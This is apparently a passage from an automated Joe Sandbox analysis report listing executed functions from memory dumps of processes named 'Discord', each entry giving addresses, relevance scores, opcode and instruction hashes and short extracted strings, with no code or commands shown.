                                      • Instruction Fuzzy Hash: 3E514536B196494FD308FBACA4B59EE7BA0FFC021475445FAD05CC73DACE2828418B88
                                      Function 00007FFD9B7C11F2 Relevance: 1.8, Strings: 1, Instructions: 581COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2P_^
                                      • API String ID: 0-2787835118
                                      • Opcode ID: 55a54699fe251d5f19e12ea704c978f7dd308f10e7b8f81c42a8d35d24cffeed
                                      • Instruction ID: d99dbaa0d9df35b58f582287fafca02c01baa50a9e5f916790141ce5dc10ebd2
                                      • Opcode Fuzzy Hash: 55a54699fe251d5f19e12ea704c978f7dd308f10e7b8f81c42a8d35d24cffeed
                                      • Instruction Fuzzy Hash: F0510727E0D69A1EE711FBBCA8758ED7B70EF86224B0941F6D089DB1E3DD1424068390
                                      Function 00007FFD9B7C11F0 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2P_^
                                      • API String ID: 0-2787835118
                                      • Opcode ID: 32687aa500f8c3699e7a9b7ba1be0c08226af119a2555157656a208e22eb96bd
                                      • Instruction ID: e681eec99ebe44221ec5339392cc884b7d104bebbbcf8dd3677a9230820278f2
                                      • Opcode Fuzzy Hash: 32687aa500f8c3699e7a9b7ba1be0c08226af119a2555157656a208e22eb96bd
                                      • Instruction Fuzzy Hash: 8D51F727E0D69A1EE711FBACA8754ED7BB0EF85224B0941F7D099DB1E3DC1824468790
                                      Function 00007FFD9B7C12B8 Relevance: .5, Instructions: 487COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01a53277ad334360027afd59432a636fc6b9d0c628d821c82199ea797ecf826c
                                      • Instruction ID: 0a494f040ac68ce790bc62b4124e152e3fd643cbbc08f8eb3367597feee08fc3
                                      • Opcode Fuzzy Hash: 01a53277ad334360027afd59432a636fc6b9d0c628d821c82199ea797ecf826c
                                      • Instruction Fuzzy Hash: 5731E472A0DA8E5FE754EBA8D8755FD7BB1FF85200F4602BAD049E32F2DD2429058750
                                      Function 00007FFD9B7C0AFB Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab6fc17273e04d771c8bff7263a8a7f5873d5dc114c684aac83968fa3b388eb5
                                      • Instruction ID: 8d7257dacb907a1ab79006eba5b87bd359ef5e71e92d4490d91d718232b7f770
                                      • Opcode Fuzzy Hash: ab6fc17273e04d771c8bff7263a8a7f5873d5dc114c684aac83968fa3b388eb5
                                      • Instruction Fuzzy Hash: 3B51D136F0861A9FE704FBACA8659FD33B1EFC4329B1542BAD019C72D7CE2464428790
                                      Function 00007FFD9B7C0B6F Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ea8be928575507d713869a70569e2dbdb46bd1620c38f1c48bd3655a9a9665b
                                      • Instruction ID: bb8e03ee85edcb10eadb2b27eb57d9374e4edd4a470e7cecca74bed76c3430a5
                                      • Opcode Fuzzy Hash: 1ea8be928575507d713869a70569e2dbdb46bd1620c38f1c48bd3655a9a9665b
                                      • Instruction Fuzzy Hash: 62412336B18A1E9FD748FBA8D865AED73A1FFC8311B5046BAD009C33D6CE3464428790
                                      Function 00007FFD9B7C0638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ed7f89e40cae6e809cc2336998fd901d08cca59d3fe644e0a668ff2adf21c42
                                      • Instruction ID: 2f64d960dc5f8b4e33146c96d963080787dc31042aa12d44289337143c5aba48
                                      • Opcode Fuzzy Hash: 1ed7f89e40cae6e809cc2336998fd901d08cca59d3fe644e0a668ff2adf21c42
                                      • Instruction Fuzzy Hash: BB31D121B1C9490FE798EE6C9469679B2C2EF98315F0505BEA01EC33E7DD24AC428341
                                      Function 00007FFD9B7C0D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ab4a859f65b8321d0a954603a954e8d5f1eefe8bbb8d653476986270c9ee097
                                      • Instruction ID: 5ba12c88b12029c69462a07c9973703a77f751d1dec7401b575af39f4fe9e615
                                      • Opcode Fuzzy Hash: 9ab4a859f65b8321d0a954603a954e8d5f1eefe8bbb8d653476986270c9ee097
                                      • Instruction Fuzzy Hash: 37219911F1490A5BFB847BBC546E7BC72D2EF98715F50417AE41DC32D7DD1868414392
                                      Function 00007FFD9B7C086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 592a60ed6e1852475cff8f5c420b6a9c6258ce0f5d9891afe47759c41581206f
                                      • Instruction ID: c0379be0f499c2d927a31516f781fa80d94a661e7139f45c70c9b4090c785d00
                                      • Opcode Fuzzy Hash: 592a60ed6e1852475cff8f5c420b6a9c6258ce0f5d9891afe47759c41581206f
                                      • Instruction Fuzzy Hash: A321D3347689494FC748EF9890B4DEEBF71FBC8200B9148E8E408C33CECE2869819B44
                                      Function 00007FFD9B7C2291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2372142539.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffd9b7c0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fa6127d6335d7d33c28d3d4491b39f4c14dd67dc929a95f0ae06586979cd25f
                                      • Instruction ID: 331ab0030b04b5b9e4f3a6efcfb69d698714fb38ca7c1b1290df182016088018
                                      • Opcode Fuzzy Hash: 1fa6127d6335d7d33c28d3d4491b39f4c14dd67dc929a95f0ae06586979cd25f
                                      • Instruction Fuzzy Hash: 71014704A0EB851EE7A1BAB818654757FE0DFD1211B0A05BFE888C62F7D8086B408392

                                      Executed Functions

                                      Function 00007FFD9B8016E9 Relevance: .7, Instructions: 699COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96c6c45c7804f02a383e0b53c3b580e967cd08a9596f4916e53aeff0c4400b71
                                      • Instruction ID: 1a8a282b9b7f403290621d4e279cd43a527707b5e3eec26407b3a29fb7782faf
                                      • Opcode Fuzzy Hash: 96c6c45c7804f02a383e0b53c3b580e967cd08a9596f4916e53aeff0c4400b71
                                      • Instruction Fuzzy Hash: A9229060B29A494FE798FB68C469BB977E2FF9C344F410579E05DC33D6DE28A8018781
                                      Function 00007FFD9B800E5E Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82f764c77c1f02819bc756ee252673b3df59980157d38a5d22ea496eda55cffc
                                      • Instruction ID: dda6ba19dffcb879efe68e218b0090b7d0b3ba34264689bec40b768d062fe085
                                      • Opcode Fuzzy Hash: 82f764c77c1f02819bc756ee252673b3df59980157d38a5d22ea496eda55cffc
                                      • Instruction Fuzzy Hash: 50712916F0D6D90EE356B77C64695E92BA1DFC622970981FBD0CDCA0E7DC0868478352
                                      Function 00007FFD9B8020C1 Relevance: .2, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d5ffb58752b7eb914b492c79783236c1ab1de8c4806b8c310052514c0e579708
                                      • Instruction ID: b2e91c996a78e9a91c8882e854598ec3db1b39e1a23cb5e49f6b0f02a4f1c78c
                                      • Opcode Fuzzy Hash: d5ffb58752b7eb914b492c79783236c1ab1de8c4806b8c310052514c0e579708
                                      • Instruction Fuzzy Hash: 5D51ED10B1E6C94FD79AABB848746A57FE5DF9B229B0804FBE0DDC61E7DD481806C342
                                      Function 00007FFD9B8007F2 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;L_$<L_^
                                      • API String ID: 0-636787459
                                      • Opcode ID: 954386b7d8a08e841144b90758c2d09754b12451400c361372e48333b17ec951
                                      • Instruction ID: d9ad1eb6e129b4e531f0c0696cacea3a57aca0a063a5846dedba2446ca8c624b
                                      • Opcode Fuzzy Hash: 954386b7d8a08e841144b90758c2d09754b12451400c361372e48333b17ec951
                                      • Instruction Fuzzy Hash: 3B5156B6B096898FD345EB6CE4A59EC7BB0FFC821574144FAD0988B3D7DE282402C780
                                      Function 00007FFD9B8011F2 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2L_^
                                      • API String ID: 0-3004606202
                                      • Opcode ID: a8daa6e928eebf304b9ba9699df5d7a7888ab9f8c56172ef1b368d292cbc85ae
                                      • Instruction ID: 95adcc61328b5ae6731f9fa11c8efa9c91520ef9a800412cd2f275f8f659c119
                                      • Opcode Fuzzy Hash: a8daa6e928eebf304b9ba9699df5d7a7888ab9f8c56172ef1b368d292cbc85ae
                                      • Instruction Fuzzy Hash: A1510423F0D68A4ED711F7ACA8764ED7FB0EF86265B0A41F6D0D9DA1E3DC1924068390
                                      Function 00007FFD9B8011F0 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2L_^
                                      • API String ID: 0-3004606202
                                      • Opcode ID: 80daacb3486c8b8048dada9af1cb90e35050acff4aa3bb29680f6da82e8529b1
                                      • Instruction ID: 1efaeda8b410bca3e876018e06ab287c9dc3343253190da215e9617ad6696006
                                      • Opcode Fuzzy Hash: 80daacb3486c8b8048dada9af1cb90e35050acff4aa3bb29680f6da82e8529b1
                                      • Instruction Fuzzy Hash: 9C51E327F0D68A4ED711F7ACA8764ED7B70EF86265B0A41F7D099DA1E3DC1824468390
                                      Function 00007FFD9B8012B8 Relevance: .5, Instructions: 487COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43199aa81de56408e4ed1eab65628076f3c738e98b265aaab07bd745896c74a2
                                      • Instruction ID: 947119a13a379c80872923d5355da36f30675943e95b29b0fbcdbdbc00c195d3
                                      • Opcode Fuzzy Hash: 43199aa81de56408e4ed1eab65628076f3c738e98b265aaab07bd745896c74a2
                                      • Instruction Fuzzy Hash: 8E31E472E0DA8E4FD751EBA8DC654ED7BB1FF9A250F4601F6D099D32E2CD2429058740
                                      Function 00007FFD9B800AFB Relevance: .2, Instructions: 206COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc82456a7d20ebb93ad2aa59827c5a6471fa825223660d44aee30e285115fdea
                                      • Instruction ID: 3a14c0077d49a8c0ddf16ffc64ac077e29ceebda907f32280956f2a7d836bf16
                                      • Opcode Fuzzy Hash: bc82456a7d20ebb93ad2aa59827c5a6471fa825223660d44aee30e285115fdea
                                      • Instruction Fuzzy Hash: 8E511236F1995E8BDB44FBACE465AFC33A1EFC8326B55417AD009C32D7CE2964428780
                                      Function 00007FFD9B800B6F Relevance: .2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5159c39c254476aa6d1f90c4f4509ac607d148a58fb0346488b1930ec061313d
                                      • Instruction ID: 0468b6e1da3a401f0af3fe73ce96605898a424b4c492a390f1c76abba74fd77d
                                      • Opcode Fuzzy Hash: 5159c39c254476aa6d1f90c4f4509ac607d148a58fb0346488b1930ec061313d
                                      • Instruction Fuzzy Hash: 7D41FF76B1595E8FDB44EBA8E865AED73A1FF88312B80457AD008C3396CE35A442C780
                                      Function 00007FFD9B800638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8733109797300430a5c57a7133ed198eed4d7eaa99cce868a3663ca06a700d6
                                      • Instruction ID: f43507592b4cd277ee5dcb6bd735495d8a29d15e610f4d999d63ea2b8669cce7
                                      • Opcode Fuzzy Hash: b8733109797300430a5c57a7133ed198eed4d7eaa99cce868a3663ca06a700d6
                                      • Instruction Fuzzy Hash: 2E31D121B1C94D0FE798EF6C946A6B9A6C2EF9C355F0505BEE05EC32E7DD64AC028341
                                      Function 00007FFD9B800D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 998f023fa85b4e843ab65b9819c6b145505cab658b67263239ee0446d5a5bcd3
                                      • Instruction ID: b3d52a940a9cdc685ba3b593338c185561e72d2924e85768cd99057348073721
                                      • Opcode Fuzzy Hash: 998f023fa85b4e843ab65b9819c6b145505cab658b67263239ee0446d5a5bcd3
                                      • Instruction Fuzzy Hash: 70218411F2890E4BFB84BBAC546E7FC62D2EF9C755F504176E41DC32D6DE28A8418392
                                      Function 00007FFD9B80086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f8cce633b10399b5d9d5f564b63753a26e283e930ff8c3110df4a7f441f069e
                                      • Instruction ID: afc1223b32f49a0f569b0568c2d84415fdd538f7cf8ba7efdc065628f21f8d7b
                                      • Opcode Fuzzy Hash: 0f8cce633b10399b5d9d5f564b63753a26e283e930ff8c3110df4a7f441f069e
                                      • Instruction Fuzzy Hash: 4B213DB57589894FD785EB58D0A5AEDBF61BFC8201BC149E4E419C339BCD2869018781
                                      Function 00007FFD9B802291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2404801716.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd9b800000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 141b50ffd5350b438719c81a9a9d87ebc7135f966df3cf0286fc241d4d11a531
                                      • Instruction ID: 80050c9c3f83eeb922fec07e658cba67dab3d10f5a50b27e56060b464e52b4a3
                                      • Opcode Fuzzy Hash: 141b50ffd5350b438719c81a9a9d87ebc7135f966df3cf0286fc241d4d11a531
                                      • Instruction Fuzzy Hash: 5F014C54A0D68A0FE7529BB858645B1BFE0CFD9251B0504F7D4CCC61A7D8486A408382

                                      Executed Functions

                                      Function 00007FFD9B7D16E9 Relevance: .7, Instructions: 701COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da00d2024f8cc0fd273bf7dd8534b2c658376b9517f67d42208f72234200a98c
                                      • Instruction ID: 18bd2b5367cb92d4297e2444c5a45dea3eecfc6d0e99c7af5ded5df39a61eba4
                                      • Opcode Fuzzy Hash: da00d2024f8cc0fd273bf7dd8534b2c658376b9517f67d42208f72234200a98c
                                      • Instruction Fuzzy Hash: 4D22B560B29A494FE798EB788479BBD77D2EFD8340F45067DE00DC32E6DE28A9418741
                                      Function 00007FFD9B7D0E5E Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22eaffde5d71c1ab2e6c9668d212350830963c6432f76d18f3a358e2d8057bbd
                                      • Instruction ID: 369d337ed3779c224358fbee675176545beb398ef91bf820945c8e42fccd0aa4
                                      • Opcode Fuzzy Hash: 22eaffde5d71c1ab2e6c9668d212350830963c6432f76d18f3a358e2d8057bbd
                                      • Instruction Fuzzy Hash: 68712916F0D6960EE356B67C64695F92BA1DFC623971981FBD0CDCA0E7DC0828478352
                                      Function 00007FFD9B7D20C1 Relevance: .2, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46793fe03cabaa1c2c1986507bd7e6aeca0dfcf0e968b74c199df410962363fa
                                      • Instruction ID: 07f8a700dbaf5897f8e6f63e24c2d1777ae0c244fcc59a645a27c71c4cf47c1d
                                      • Opcode Fuzzy Hash: 46793fe03cabaa1c2c1986507bd7e6aeca0dfcf0e968b74c199df410962363fa
                                      • Instruction Fuzzy Hash: 21510E10B1E6C94FD796ABB888746A57FE5DF87219B0806FBE09DC61E7DD18180AC342
                                      Function 00007FFD9B7D07F2 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;O_$<O_^
                                      • API String ID: 0-3431308889
                                      • Opcode ID: db8aab6df4bee7ce86a4826e94776b3b93e873064b9526f555bec7976701c058
                                      • Instruction ID: 952871612c1aa6977bebe9e66b133afc5a26ba5d1fef1b16ee489dca40642fc5
                                      • Opcode Fuzzy Hash: db8aab6df4bee7ce86a4826e94776b3b93e873064b9526f555bec7976701c058
                                      • Instruction Fuzzy Hash: F3512436F096894FD704EB68A0B58EC7BA0EFC4314B5545FAD4588B3DBDD3868468740
                                      Function 00007FFD9B7D11F2 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 6fb334a299daaab9adfef1ddddc2e0fdee2d2725c4cdc59b268792b0e196fba7
                                      • Instruction ID: fb9eaf09c307ad43c2ff639d4c677ea53a26d57b174ae24bbd8a91006bcf1c64
                                      • Opcode Fuzzy Hash: 6fb334a299daaab9adfef1ddddc2e0fdee2d2725c4cdc59b268792b0e196fba7
                                      • Instruction Fuzzy Hash: FF511527F0969A4ED711FBACA4755ED7B70EFC2225B0A42F7C09DDA1E3DD14284A8390
                                      Function 00007FFD9B7D11F0 Relevance: 1.8, Strings: 1, Instructions: 576COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 3965e3dfdf327c9fd4b5b89d797357cd45928c6953c7876b73a4058aa573f782
                                      • Instruction ID: 8eec0dbe39411eee1810335f8f363add8e12051500edca192dfd0abc1ab0306c
                                      • Opcode Fuzzy Hash: 3965e3dfdf327c9fd4b5b89d797357cd45928c6953c7876b73a4058aa573f782
                                      • Instruction Fuzzy Hash: 5E512627F0969A0ED711FB6CA4755ED7B70EFC2225B0A42F7C09DDA1E3DC18284A8390
                                      Function 00007FFD9B7D12B8 Relevance: .5, Instructions: 487COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1013cc69962d5f74f5d2bb0a6ac542f574156768de42b95a8fea35527e0777d0
                                      • Instruction ID: 9d3b2f0b45c72c8df0585cda4a9c8b822c7415c3066a1e79c251152f9de1fa01
                                      • Opcode Fuzzy Hash: 1013cc69962d5f74f5d2bb0a6ac542f574156768de42b95a8fea35527e0777d0
                                      • Instruction Fuzzy Hash: AC31D072B09A8E4FD7519B68D8755EDBBB1FFC6240F4602B6C049E72F6CD242909C350
                                      Function 00007FFD9B7D0AFB Relevance: .2, Instructions: 207COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c842a1b083fabc3d4c90686654b715f4b8a47be311d9dfc9448123029612c012
                                      • Instruction ID: ad8340e86d0bf9cc95f34abd2a458bbea50411ac28884872daa71ad0bbe5df6c
                                      • Opcode Fuzzy Hash: c842a1b083fabc3d4c90686654b715f4b8a47be311d9dfc9448123029612c012
                                      • Instruction Fuzzy Hash: EA51F536F0961A8BDB04FBACA475AEC73B1FFC4326B55467AD009C72D6CE246885C790
                                      Function 00007FFD9B7D0B6F Relevance: .2, Instructions: 160COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4fa6bbdd029069e4a89b0b1287c79149947f5c91d44810dbe619fbc50b45ccfc
                                      • Instruction ID: 19c679ff69dea44b054a5638b363401f0f2d909a89bb97d57073d1ff8afa9a1d
                                      • Opcode Fuzzy Hash: 4fa6bbdd029069e4a89b0b1287c79149947f5c91d44810dbe619fbc50b45ccfc
                                      • Instruction Fuzzy Hash: 1841D136B18A1E8FDB44FB68D865AED73A1FFC4311B54467AD009C72D6CE34A886C790
                                      Function 00007FFD9B7D0638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
